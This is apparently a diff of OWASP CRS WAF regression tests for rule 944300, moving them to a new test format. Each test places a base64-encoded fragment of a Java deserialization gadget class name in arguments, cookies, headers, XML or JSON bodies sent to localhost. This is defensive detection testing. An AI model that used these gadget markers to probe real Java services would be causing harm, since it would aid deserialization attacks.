headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvdG90eXBlY2xvbmVmYWN0b3J5=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 236 desc: "Request header test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: cHJvdG90eXBlY2xvbmVmYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-237 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cHJvdG90eXBlY2xvbmVmYWN0b3J5 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 237 desc: "XML attribute value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - 
method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-238 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 238 desc: "XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-239 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 239 desc: "Nested XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 
Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-240 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 240 desc: "Content-Type text/plain includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-241 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 241 desc: "Content-Type application/json arg value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"cHJvdG90eXBlY2xvbmVmYWN0b3J5\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-242 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"cHJvdG90eXBlY2xvbmVmYWN0b3J5\"}" + output: + log: + expect_ids: [944300] + - test_id: 242 desc: "Content-Type application/json arg name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"cHJvdG90eXBlY2xvbmVmYWN0b3J5\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-243 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"cHJvdG90eXBlY2xvbmVmYWN0b3J5\": 
\"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 243 desc: "Argument test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-244 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 244 desc: "Argument name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-245 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test" + output: + log: + expect_ids: [944300] + - test_id: 245 desc: "Cookie test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-246 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 246 desc: "Cookie name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test - method: 
"POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-247 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 247 desc: "Request header test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HByb3RvdHlwZWNsb25lZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-248 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HByb3RvdHlwZWNsb25lZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 248 desc: "XML attribute value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-249 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 249 desc: "XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-250 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 250 desc: "Nested XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - 
dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-251 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 251 desc: "Content-Type text/plain includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-252 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log: + 
expect_ids: [944300] + - test_id: 252 desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-253 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\"}" + output: + log: + expect_ids: [944300] + - test_id: 253 desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-254 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 254 desc: "Argument test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-255 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 255 desc: "Argument name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-256 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test" + output: + log: + expect_ids: [944300] + - test_id: 256 desc: "Cookie test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-257 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 257 desc: "Cookie name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-258 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 258 desc: "Request header test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-259 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: 
+ expect_ids: [944300] + - test_id: 259 desc: "XML attribute value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-260 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 260 desc: "XML element value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-261 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + 
